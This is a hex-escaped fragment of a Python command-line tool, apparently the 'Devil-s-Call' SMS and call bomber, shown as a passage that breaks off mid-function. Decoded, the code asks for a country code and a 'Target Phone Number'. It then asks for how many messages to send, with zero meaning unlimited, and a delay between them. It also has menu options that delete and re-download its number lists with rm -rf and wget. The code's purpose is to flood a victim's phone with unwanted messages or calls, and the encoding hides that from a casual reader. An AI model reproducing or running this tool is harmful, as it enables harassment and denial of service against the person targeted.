\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x31\x7b\x30\x7d\x5d\x7b\x32\x7d\x44\x65\x6c\x65\x74\x65\x20\x53\x4d\x53\x20\x48\x69\x73\x74\x6f\x72\x79\x20\x5c\x6e\x7b\x34\x7d\x7b\x30\x7d\x5b\x7b\x32\x7d\x32\x7b\x30\x7d\x5d\x7b\x32\x7d\x44\x65\x6c\x65\x74\x65\x20\x43\x61\x6c\x6c\x20\x48\x69\x73\x74\x6f\x72\x79\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61\x6d\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x35\x7d\x2d\x2d\x2d\x2d\x3e\x7b\x32\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x61\x6d\x20\x3d\x3d\x20\x22\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x72\x6d\x20\x2d\x72\x66\x20\x64\x61\x74\x61\x2f\x73\x6d\x73\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x64\x20\x64\x61\x74\x61\x20\x26\x26\x20\x77\x67\x65\x74\x20\x2d\x71\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x72\x61\x77\x2e\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63\x6f\x6e\x74\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x2f\x44\x65\x76\x69\x6c\x2d\x73\x2d\x43\x61\x6c\x6c\x2f\x6d\x61\x73\x74\x65\x72\x2f\x64\x61\x74\x61\x2f\x73\x6d\x73\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x20\x26\x26\x20\x63\x64\x20\x2e\x2e\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x61\x6d\x20\x3d\x3d\x20\x22\x32\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x72\x6d\x20\x2d\x72\x66\x20\x64\x61\x74\x61\x2f\x63\x61\x6c\x6c\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x64\x20\x64\x61\x74\x61\x20\x26\x26\x20\x77\x67\x65\x74\x20\x2d\x71\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x72\x61\x77\x2e\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63\x6f\x6e\x74\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x2f\x44\x65\x76\x69\x6c\x2d\x73\x2d\x43\x61\x6c\x6c\x2f\x6d\x61\x73\x74\x65\x72\x2f\x64\x61\x74\x61\x2f\x63\x61\x6c\x6c\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x20\x26\x26\x20\x63\x64\x20\x2e\x2e\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x53\x6f\x6d\x65\x74\x68\x69\x6e\x67\x20\x57\x65\x6e\x74\x20\x57\x72\x6f\x6e\x67\x2e\x2e\x2e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x3d\x20\x27\x34\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x0a\x64\x65\x66\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x3a\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x63\x63\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x70\x6e\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x70\x6e\x20\x3d\x20\x22\x22\x0a\x20\x20\x20\x20\x23\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x0a\x20\x20\x20\x20\x74\x72\x20\x3d\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x20\x7b\x30\x7d\x50\x52\x45\x53\x53\x20\x7b\x36\x7d\x22\x7b\x34\x7d\x7b\x30\x7d\x51\x7b\x36\x7d\x22\x7b\x34\x7d\x20\x7b\x30\x7d\x52\x45\x54\x55\x52\x4e\x20\x54\x4f\x20\x4d\x41\x49\x4e\x20\x4d\x45\x4e\x55\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x63\x63\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x43\x6f\x64\x65\x20\x7b\x35\x7d\x28\x7b\x32\x7d\x57\x69\x74\x68\x6f\x75\x74\x20\x2b\x7b\x35\x7d\x29\x20\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x33\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x63\x63\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x27\x2b\x27\x20\x69\x6e\x20\x63\x63\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x63\x20\x3d\x20\x6c\x69\x73\x74\x28\x63\x63\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x63\x2e\x72\x65\x6d\x6f\x76\x65\x28\x27\x2b\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x63\x20\x3d\x20\x27\x27\x2e\x6a\x6f\x69\x6e\x28\x74\x63\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x63\x20\x3d\x20\x63\x63\x2e\x73\x74\x72\x69\x70\x28\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6c\x65\x6e\x28\x63\x63\x29\x20\x3e\x3d\x20\x34\x20\x6f\x72\x20\x6c\x65\x6e\x28\x63\x63\x29\x20\x3c\x20\x31\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x7b\x32\x7d\x5b\x7b\x30\x7d\x23\x7b\x32\x7d\x5d\x7b\x30\x7d\x49\x6e\x76\x61\x6c\x69\x64\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x43\x6f\x64\x65\x2e\x2e\x2e\x2e\x5c\x6e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x20\x20\x20\x20\x64\x70\x6e\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x54\x61\x72\x67\x65\x74\x20\x50\x68\x6f\x6e\x65\x20\x4e\x75\x6d\x62\x65\x72\x20\x5c\x74\x5c\x74\x7b\x37\x7d\x7b\x30\x7d\x3a\x7b\x34\x7d\x7b\x35\x7d\x20\x2b\x7b\x33\x7d\x20\x7b\x36\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x63\x63\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x64\x70\x6e\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x70\x6e\x20\x3d\x20\x72\x65\x6d\x73\x70\x28\x64\x70\x6e\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6c\x65\x6e\x28\x70\x6e\x29\x20\x3c\x3d\x20\x36\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x7b\x32\x7d\x5b\x7b\x30\x7d\x23\x7b\x32\x7d\x5d\x7b\x30\x7d\x49\x6e\x76\x61\x6c\x69\x64\x20\x50\x68\x6f\x6e\x65\x20\x4e\x75\x6d\x62\x65\x72\x2e\x2e\x2e\x2e\x5c\x6e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x66\x6f\x72\x20\x63\x63\x68\x20\x69\x6e\x20\x73\x74\x72\x28\x63\x63\x20\x2b\x20\x70\x6e\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x6e\x6f\x74\x20\x63\x63\x68\x2e\x69\x73\x64\x69\x67\x69\x74\x28\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x7b\x32\x7d\x5b\x7b\x30\x7d\x23\x7b\x32\x7d\x5d\x7b\x30\x7d\x50\x68\x6f\x6e\x65\x20\x4e\x75\x6d\x62\x65\x72\x20\x4d\x75\x73\x74\x20\x43\x6f\x6e\x73\x69\x73\x74\x20\x4f\x66\x20\x4e\x75\x6d\x62\x65\x72\x73\x20\x4f\x6e\x6c\x79\x5c\x6e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x64\x65\x66\x20\x6e\x6f\x5f\x73\x6d\x73\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x69\x66\x20\x63\x63\x20\x3d\x3d\x20\x22\x39\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x4e\x6f\x2e\x6f\x66\x20\x4d\x65\x73\x73\x61\x67\x65\x73\x20\x54\x6f\x20\x53\x65\x6e\x64\x7b\x35\x7d\x28\x7b\x33\x7d\x30\x20\x46\x6f\x72\x20\x55\x6e\x6c\x69\x6d\x69\x74\x65\x64\x7b\x35\x7d\x29\x20\x20\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x66\x6c\x6f\x61\x74\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x46\x6f\x72\x20\x4d\x65\x73\x73\x61\x67\x65\x7b\x35\x7d\x28\x7b\x30\x7d\x69\x6e\x20\x73\x65\x63\x6f\x6e\x64\x73\x7b\x35\x7d\x29\x20\x7b\x33\x7d\x5b\x7b\x32\x7d\x52\x65\x63\x6f\x6d\x6d\x65\x6e\x64\x65\x64\x20\x32\x20\x73\x65\x63\x7b\x33\x7d\x5d\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x64\x6c\x20\x3c\x20\x32\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70\x74\x20\x43\x61\x6e\x27\x74\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4c\x65\x73\x73\x20\x54\x68\x65\x6e\x20\x32\x20\x53\x65\x63\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x32\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x